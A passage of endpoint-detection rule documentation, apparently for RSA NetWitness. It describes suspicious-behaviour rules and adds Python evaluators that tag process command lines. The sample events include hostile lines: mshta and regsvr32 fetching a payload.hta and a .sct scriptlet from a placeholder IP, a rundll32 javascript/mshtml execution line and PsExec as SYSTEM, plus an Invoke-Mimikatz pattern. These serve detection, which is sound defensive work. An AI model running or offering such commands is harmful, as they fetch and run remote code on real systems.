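    ("ioc", "runs powershell invoke-mimikatz function",
     re.compile(r"Invoke-Mimikatz", re.I)),
]
LONG_ARGUMENT_THRESHOLD = 1000  # assumption: the page does not state the rule's threshold


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def evaluate_powershell(cmdline):
    """Apply the rules to one command line; returns {meta_key: [values]}."""
    meta = {"analysis.file": ["runs powershell"]}
    # Scan the decoded payload too, so encoding cannot hide a download cradle
    # or URL from the download/HTTP rules.
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    for key, value, pattern in POWERSHELL_RULES:
        if pattern.search(text):
            meta.setdefault(key, []).append(value)
    arguments = cmdline.split(None, 1)[1] if " " in cmdline else ""
    if len(arguments) > LONG_ARGUMENT_THRESHOLD:
        meta.setdefault("boc", []).append("runs powershell with long arguments")
    return meta


if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        print(cmd[:60].ljust(60), evaluate_powershell(cmd))
```

The decoded payload of the second sample is the plain download cradle, so that event is tagged for the hidden window, the encoded command, downloading content and the HTTP argument, even though none of those strings appear in the raw command line.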
Runs Ps (runs_ps)
ps displays process status information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ps
Runs PSEXEC On Remote System And Silently Accepts User License (runs_psexec_on_remote_system_and_silently_accepts_user_license)
Running PsExec on a remote system while silently accepting the user license (the -accepteula switch) can be an indication of someone executing a binary, command or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs psexec on remote system and silently accepts user license
Runs PSEXEC On Remote System As SYSTEM User (runs_psexec_on_remote_system_as_system_user)
Running PsExec on a remote system as the SYSTEM user (the -s switch) can be an indication of someone executing a binary, command or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs psexec on remote system as system user
Runs Registry Tool (runs_registry_tool)
Running the registry tool can be an indication of malware changing settings, adding persistence or lowering the security of a system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs registry tool
Runs Regsvr32 COM Scriplets (runs_regsvr32_com_scriplets)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of it to proxy execution of code and avoid triggering security tools, for example by loading a COM scriptlet (.sct) through scrobj.dll.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 com scriplets
Runs Regsvr32 Using One Letter DLL (runs_regsvr32_using_one_letter_dll)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of it to proxy execution of code and avoid triggering security tools. A one-letter DLL name is atypical and could be a signature of an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 using one letter dll
Runs Regsvr32 With HTTP Argument (runs_regsvr32_with_http_argument)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of it to proxy execution of code and avoid triggering security tools. Regsvr32 given an HTTP URL (fetching a scriptlet or DLL from a remote server) could indicate command and control behavior.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 with http argument
Runs Regsvr32 Without Arguments (runs_regsvr32_without_arguments)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of it to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs regsvr32 without arguments
Runs Remote Execution Tool (runs_remote_execution_tool)
Running a remote execution tool can be an indication of someone executing a binary, command or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs remote execution tool
Runs Remote Powershell Command (runs_remote_powershell_command)
Running a remote PowerShell command can be an indication of someone running malicious PowerShell commands remotely, which can be further used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs remote powershell command
Runs robocopy.exe (runs_robocopy.exe)
Running robocopy.exe can be an indication of an adversary using automated techniques to collect internal data.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs robocopy.exe
Runs Rundll32 Using One Letter DLL (runs_rundll32_using_one_letter_dll)
Rundll32.exe can be called to load an arbitrary DLL and execute one of its exports. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools. A one-letter DLL name is atypical and could be a signature of an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 using one letter dll
Runs Rundll32 With HTTP Argument (runs_rundll32_with_http_argument)
Rundll32.exe can be called to load an arbitrary DLL and execute one of its exports. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools; an HTTP URL on the rundll32 command line suggests remote content is being fetched.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 with http argument
Runs Rundll32 With Javascript Argument (runs_rundll32_with_javascript_argument)
Rundll32.exe can be called to load an arbitrary DLL and execute one of its exports, and a javascript: argument lets it run script through the mshtml RunHTMLApplication export. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 with javascript argument
Runs Rundll32 Without Arguments (runs_rundll32_without_arguments)
Rundll32.exe can be called to load an arbitrary DLL and execute one of its exports. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs rundll32 without arguments
Runs Scripting Engine (runs_scripting_engine)
Running a scripting engine (such as wscript.exe or cscript.exe) can be an indication of someone running malicious commands to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs scripting engine
Runs Scripting Engine In Batch Mode Using Execution Engine Argument (runs_scripting_engine_in_batch_mode_using_execution_engine_argument)
Running the scripting engine in batch mode with an explicit execution engine argument (for example cscript //B //E:jscript, which suppresses prompts and forces the script language regardless of file extension) can be an indication of someone running malicious commands from the command line to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs scripting engine in batch mode using execution engine argument
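The mshta, msiexec, regsvr32, rundll32, PsExec, scripting engine and one-letter rules above are all judgements about the shape of a process's arguments. The following is an added example, not RSA's rule implementation and not code from the page: an evaluator that applies those rules to a (image path, command line) pair and emits the meta key names the table lists. The sample events are constructed, the 198.51.100.7 address and the host name host01 are placeholders, and the list of script extensions counted as "scripts" is an assumption. Note how the rundll32 argument form path.dll,Export has to be split before the one-letter check, and how a single http argument on regsvr32 can legitimately fire both the HTTP and the scriptlet rule.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process events (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe http://198.51.100.7/payload.hta"),
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe javascript:alert(1)"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
    (r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\a.dll,Start"),
    (r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write()'),
    (r"C:\Windows\System32\cscript.exe", r"cscript.exe //B //E:jscript C:\Users\Public\u.txt"),
    (r"C:\Tools\PsExec.exe", r"PsExec.exe \\host01 -accepteula -s cmd.exe"),
    (r"C:\Users\Public\a.exe", r"a.exe"),
    (r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /q /i C:\Temp\app.msi"),
]

SCRIPT_EXTS = {".ps1", ".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".wsf", ".hta"}  # assumption
HTTP_RE = re.compile(r"https?://", re.I)
SCRIPT_URI_RE = re.compile(r"\b(?:javascript|vbscript):", re.I)
SCRIPTLET_RE = re.compile(r"scrobj\.dll|\.sct\b", re.I)


def split_args(cmdline):
    """Tokenise a Windows command line, keeping quoted strings as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def one_letter(path):
    """True when the file's base name (without extension) is a single character."""
    return len(PureWindowsPath(path).stem) == 1


def evaluate_lolbin(image, cmdline):
    """Apply the argument-shape rules to one event; returns {meta_key: [values]}."""
    meta = {}

    def tag(key, value):
        meta.setdefault(key, []).append(value)

    exe = PureWindowsPath(image).name.lower()
    args = split_args(cmdline)[1:]            # drop argv[0]
    joined = " ".join(args)
    has_http = bool(HTTP_RE.search(joined))
    # rundll32 writes the DLL as "path.dll,Export"; strip the export before checking.
    one_letter_dll = any(one_letter(a.split(",")[0]) for a in args if ".dll" in a.lower())

    if exe == "mshta.exe":
        if has_http:
            tag("boc", "runs mshta with http argument")
        if SCRIPT_URI_RE.search(joined):
            tag("boc", "runs mshta with script argument")
    elif exe == "msiexec.exe":
        if has_http:
            tag("boc", "runs msiexec with http argument")
    elif exe == "regsvr32.exe":
        if not args:
            tag("analysis.file", "runs regsvr32 without arguments")
        if has_http:
            tag("boc", "runs regsvr32 with http argument")
        if SCRIPTLET_RE.search(joined):
            tag("boc", "runs regsvr32 com scriplets")
        if one_letter_dll:
            tag("boc", "runs regsvr32 using one letter dll")
    elif exe == "rundll32.exe":
        if not args:
            tag("analysis.file", "runs rundll32 without arguments")
        if has_http:
            tag("boc", "runs rundll32 with http argument")
        if re.search(r"\bjavascript:", joined, re.I):
            tag("boc", "runs rundll32 with javascript argument")
        if one_letter_dll:
            tag("boc", "runs rundll32 using one letter dll")
    elif exe in ("wscript.exe", "cscript.exe"):
        tag("analysis.file", "runs scripting engine")
        if re.search(r"//b\b", joined, re.I) and re.search(r"//e:\w+", joined, re.I):
            tag("analysis.file",
                "runs scripting engine in batch mode using execution engine argument")
    elif exe in ("psexec.exe", "psexec64.exe"):
        tag("boc", "runs remote execution tool")
        switches = {a.lower().lstrip("-/") for a in args if a[:1] in ("-", "/")}
        if "accepteula" in switches:
            tag("boc", "runs psexec on remote system and silently accepts user license")
        if "s" in switches:
            tag("boc", "runs psexec on remote system as system user")

    # Name-shape rules apply regardless of which program ran.
    if exe.endswith(".exe") and one_letter(exe):
        tag("boc", "runs one letter executable")
    if any(PureWindowsPath(a).suffix.lower() in SCRIPT_EXTS and one_letter(a) for a in args):
        tag("boc", "runs one letter script")
    return meta


if __name__ == "__main__":
    for image, cmdline in SAMPLE_EVENTS:
        print(cmdline[:50].ljust(50), evaluate_lolbin(image, cmdline))
```

Matching on the image base name rather than on argv[0] matters: an attacker can rename a copy of the binary or supply a misleading argv[0], so the evaluator trusts the path the agent recorded for the process image.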
Runs Service Control Tool (runs_service_control_tool)
Running the service control tool (sc.exe) allows the creation, deletion, starting, stopping and querying of Windows services from the command line.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs service control tool
Runs Sh (runs_sh)
sh is the shell used to run shell scripts.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs sh
Runs Shim Database Installer (runs_shim_database_installer)
The Microsoft Windows Application Compatibility Toolkit (ACT) enables shims to provide backward compatibility for legacy applications on newer versions of Windows; the shim database installer (sdbinst.exe) registers a shim database on the system. Malicious actors may use shims to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs shim database installer
Runs Suspicious File By Reputation Service (runs_suspicious_file_by_reputation_service)
Indicates execution of a file whose hash the reputation service has tagged as suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs suspicious file by reputation service
Runs Tar (runs_tar)
Indicates a tar archive is being created or extracted.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs tar
Runs Tasks Management Tool (runs_tasks_management_tool)
Running at.exe or schtasks.exe allows a script, program or command to be executed at a specific date and time.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs tasks management tool
Runs Unzip (runs_unzip)
An archive file is being extracted with the unzip tool.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs unzip
Runs waitfor.exe (runs_waitfor.exe)
Running waitfor.exe can be an indication of someone trying to compromise the integrity of the security solution by adding unexpected delays, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs waitfor.exe
Runs WMI Command-Line Tool (runs_wmi_command-line_tool)
WMIC.exe provides a command-line interface to Windows Management Instrumentation (WMI).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs wmi command-line tool
Runs WMI Scripting Engine (runs_wmi_scripting_engine)
Windows Management Instrumentation (WMI) is used to access management information in an enterprise environment for both local and remote systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs wmi scripting engine
Runs xcopy.exe (runs_xcopy.exe)
Running xcopy.exe can be an indication of an adversary using automated techniques to collect internal data.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs xcopy.exe
Safari Fraud Website Warning Disabled (safari_fraud_website_warning_disabled)
Safari warns you when the site you are visiting is a suspected phishing website. Disabling this setting puts your personal information at risk, as you lose visibility into sites masquerading as legitimate ones.
Scripting Addition In Process (scripting_addition_in_process)
A scripting addition is a code library, loaded by the AppleScript scripting component instance, that implements vocabulary extending the AppleScript language. On Mac OS X the supplied osaxen (scripting addition bundles) live in /System/Library/ScriptingAdditions; a user may add osaxen to /Library/ScriptingAdditions or to ~/Library/ScriptingAdditions, depending on the domain in which they should be available.
Scripting Engine Injects Remote Process (scripting_engine_injects_remote_process)
A scripting engine injecting into a remote process can be an indication of someone creating and running malicious processes to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = scripting engine injects remote process
Scripting Engine Runs Powershell (scripting_engine_runs_powershell)
Both commodity cyber criminals and targeted attackers make heavy use of PowerShell, as its flexibility makes it an ideal attack tool on Windows systems. A scripting engine launching PowerShell can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = scripting engine runs powershell
Scripting Engine Runs Regsvr32 (scripting_engine_runs_regsvr32)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. A scripting engine launching regsvr32 can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = scripting engine runs regsvr32
Scripting Engine Runs Rundll32 (scripting_engine_runs_rundll32)
A scripting engine launching rundll32 can be an indication of someone running a malicious DLL and loading its code into memory to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = scripting engine runs rundll32
Self Signed (self_signed)
A self-signed certificate is one signed with its own private key rather than issued by a certificate authority (CA). This is atypical for legitimately distributed software, whose code-signing certificate would normally chain to a trusted CA.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = self signed
Services In ProgramData Directory (services_in_programdata_directory)
Services running out of the ProgramData directory (hidden by default) can indicate a defense evasion measure intended to hide malicious execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = services in programdata directory
Services Runs Command Shell (services_runs_command_shell)
A service running a command shell can be an indication of someone creating and running malicious processes to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = services runs command shell
Smartscreen Filter Disabled (smartscreen_filter_disabled)
Disabling the SmartScreen filter can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = smartscreen filter disabled
Starts Local Service (starts_local_service)
Starting a local service can be an indication of someone creating and running malicious services to exploit the system, which can be further used to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = starts local service
Starts RDP Service (starts_rdp_service)
Starting the RDP service can be an indication of adversaries trying to connect to a remote system over RDP/RDS to expand access, if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for persistence, or perform RDP session hijacking, which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = starts rdp service
Starts Remote Service (starts_remote_service)
Starting a remote service can be an indication of someone executing a binary, command or script via a method that interacts with Windows services, such as the Service Control Manager.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = starts remote service
Stops Error Reporting Service (stops_error_reporting_service)
Stopping the error reporting service can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops error reporting service
Stops Security Service (stops_security_service)
Stopping a security service can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops security service
Stops Windows Update Service (stops_windows_update_service)
Stopping the Windows Update service can be an indication of someone trying to keep the system from receiving the latest security updates, leaving it vulnerable, or trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops windows update service
Sudo No Password Prompt (sudo_no_password_prompt)
sudo allows a user to run programs with the security privileges of another user or, if no user name is specified, as the superuser with root privileges. A NOPASSWD entry in the sudoers configuration removes the password prompt, and adversaries can take advantage of that configuration to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file.
Suspicious File By Reputation Service (suspicious_file_by_reputation_service)
Indicates presence of a file whose hash the reputation service has tagged as suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = suspicious file by reputation service
Suspicious REGSVR32.EXE Task (suspicious_regsvr32.exe_task)
Regsvr32.exe is a command-line program used to register and unregister object linking and embedding (OLE) controls, such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of it to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = suspicious regsvr32.exe task
System Integrity Protection Disabled (system_integrity_protection_disabled)
System Integrity Protection (SIP), introduced in Mac OS X 10.11, is intended to prevent malware from modifying protected system locations. Some low-level utilities only function with unrestricted access to the file system, which can be a legitimate reason for disabling the feature. However, even power users would generally have no reason to disable this setting, and doing so is considered very suspicious behavior.
System Restore Disabled (system_restore_disabled)
Disabling System Restore can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = system restore disabled
Task Manager Disabled (task_manager_disabled)
Task Manager provides information about the processes running on a system and their memory use. Disabling Task Manager may prevent a user from noticing anomalous processes.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = task manager disabled
Tasks In ProgramData Directory (tasks_in_programdata_directory)
Scheduled tasks running out of the ProgramData directory (hidden by default) can indicate a defense evasion measure intended to hide malicious execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = tasks in programdata directory
Terminates Process (terminates_process)
Terminating a process can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = terminates process
Transfers File Using BITS (transfers_file_using_bits)
Background Intelligent Transfer Service (BITS) is a Windows component that transfers files in the background; jobs persist across reboots and the transfer is carried out by the BITS service host rather than by the requesting process. It has commonly been used to download malware, typically via bitsadmin.exe or the PowerShell Start-BitsTransfer cmdlet, because the network connection is made by the service host and not by the process that requested it.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = transfers file using bits
UAC Disabled (uac_disabled)
User Account Control (UAC) prompts for consent before a process is granted administrative rights. Disabling it (EnableLUA set to 0) can indicate that an attacker with administrative access is preparing to elevate or run further tooling without any prompt, and is often seen alongside UAC bypass techniques: an attacker can elevate privileges to administrator if the target process is unprotected, and malicious code injected into a trusted, auto-elevating process gains elevated privileges without prompting the user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = uac disabled
Unexpected csrss.exe Parent (unexpected_csrss.exe_parent)
A csrss.exe whose parent is not smss.exe can indicate masquerading: a malicious binary named after a core OS process, or a process chain that does not match the normal Windows startup sequence, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected csrss.exe parent
Unexpected Explorer.exe Destination Location (unexpected_explorer.exe_destination_location)
An explorer.exe that appears as the target (destination) of an event at a location other than %SystemRoot%\explorer.exe can indicate masquerading: a malicious binary named after a core OS process in order to gain access to the system or greater privileges than the actor is authorized for.
Unexpected explorer.exe Parent (unexpected_explorer.exe_parent)
An explorer.exe whose parent is not userinit.exe (which normally has already exited) or another explorer.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected explorer.exe parent
Unexpected Explorer.exe Source Location (unexpected_explorer.exe_source_location)
An explorer.exe acting as the source process of an event from a location other than %SystemRoot%\explorer.exe can indicate masquerading: a malicious binary named after a core OS process in order to gain access to the system or greater privileges than the actor is authorized for.
Unexpected lsass.exe Parent (unexpected_lsass.exe_parent)
An lsass.exe whose parent is not wininit.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected lsass.exe parent
Unexpected lsm.exe Parent (unexpected_lsm.exe_parent)
An lsm.exe (Local Session Manager, present on Windows 7 and Server 2008 R2) whose parent is not wininit.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected lsm.exe parent
Unexpected msdtc.exe Parent (unexpected_msdtc.exe_parent)
An msdtc.exe whose parent is not services.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected msdtc.exe parent
Unexpected OS Process Destination Location (unexpected_os_process_destination_location)
A core OS process that appears as the target (destination) of an event at a location other than its normal one (most live in %SystemRoot%\System32) can indicate masquerading: a malicious binary named after a core OS process in order to gain access to the system or greater privileges than the actor is authorized for.
Unexpected OS Process Source Location (unexpected_os_process_source_location)
A core OS process acting as the source process of an event from a location other than its normal one (most live in %SystemRoot%\System32) can indicate masquerading: a malicious binary named after a core OS process in order to gain access to the system or greater privileges than the actor is authorized for.
Unexpected runtimebroker.exe Parent (unexpected_runtimebroker.exe_parent)
A runtimebroker.exe whose parent is not svchost.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected runtimebroker.exe parent
Unexpected services.exe Parent (unexpected_services.exe_parent)
A services.exe whose parent is not wininit.exe can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected services.exe parent
Unexpected smss.exe Parent (unexpected_smss.exe_parent)
An smss.exe whose parent is neither the System process (for the first instance) nor another smss.exe (for per-session instances) can indicate masquerading: a malicious binary named after a core OS process, used to blend in, gain access to the system, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected smss.exe parent
Unexpected Svchost Arguments (unexpected_svchost_arguments)
